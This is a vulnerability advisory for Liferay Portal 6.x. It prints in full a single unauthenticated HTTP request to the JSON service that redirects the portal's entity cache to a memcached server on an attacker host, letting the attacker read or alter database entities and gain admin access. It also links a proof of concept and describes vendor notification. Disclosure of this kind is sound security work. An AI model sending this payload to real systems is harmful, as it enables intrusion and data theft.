Specially crafted Json service request allows full control over a Liferay portal instance Description: Liferay Portal is an enterprise portal written in Java By doing a single http request you can reconfigure Liferay to use a remote Memcached cache instead of it's own cache. http://vulnerablehost/c/portal/json_service?serviceClassName=com.liferay.portal.service.UserServiceUtil&serviceMethodName=updatePortrait&serviceParameters=[%22userId%22%2C%22bytes%22]&userId=1&bytes={"class":"com.liferay.portal.kernel.dao.orm.EntityCacheUtil","entityCache":{"class":"com.liferay.portal.dao.orm.common.EntityCacheImpl","multiVMPool":{"class":"com.liferay.portal.cache.MultiVMPoolImpl","portalCacheManager":{"class":"com.liferay.portal.cache.memcached.MemcachePortalCacheManager","timeout":60,"timeoutTimeUnit":"SECONDS","memcachedClientPool":{"class":"com.liferay.portal.cache.memcached.DefaultMemcachedClientFactory","connectionFactory":{"class":"net.spy.memcached.BinaryConnectionFactory"},"addresses":["remoteattackerhost:11211"]}}}}} This means that all entities stored in the database will now be cached in a Memcached instance hosted on the attackers host, where they can be retrieved or manipulated at will by the attacker. A moderately skilled attacker could leverage this to gain administrative access to the system. The attacker does not need to have an account on the portal in order to execute this attack Proof of concept: Code demonstrating the vulnerability can be found at https://github.com/jelmerk/LPS-26558-proof Systems affected: Liferay 6.1 ce is confirmed to be vulnerable Liferay 6 ee service servicepack 2 is most likely vulnerable Liferay 6.1 ee is most likely vulnerable Vendor status : Liferay was notified april 6 2012 by filing a bug in their public bugtracker under issue number LPS-26558. The issue has since been flagged as private and has been resolved.
